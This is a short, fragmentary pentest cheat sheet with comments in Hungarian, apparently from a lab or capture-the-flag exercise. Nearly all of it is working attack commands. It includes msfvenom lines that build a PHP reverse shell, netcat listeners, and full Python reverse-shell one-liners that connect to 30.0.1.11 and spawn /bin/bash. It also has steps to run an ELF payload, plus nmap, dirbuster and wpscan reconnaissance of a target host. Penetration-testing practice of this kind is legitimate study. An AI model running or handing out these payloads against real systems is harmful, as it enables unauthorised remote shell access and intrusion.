msfvenom -l playloads

// listener
30.0.1.11
nc -lvnp 4444 

// ip cím kiírása
ip a

// fájl csinálás msfvenom
msfvenom -p php/reverse_php LHOST=30.0.1.11 LPORT=4444 -f raw > shell.php

// chain shelling nem php és php esetén
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("30.0.1.11",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("30.0.1.11",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

// php esetén
nc -lvnp 4444 
msfvenom -p php/reverse_php LHOST=30.0.1.11 LPORT=4444 -f raw > shell.php // másik shellbe
chmod +x kriszshell.elf // másik shellbe
./kriszshell.elf listenerbe

// feltérképezés
sudo nmap -sS -sV 40.0.4.10

// egy weblap feltérképezése
dirbuster
/usr/share/wordlists/dirb/common.txt

wpscan 
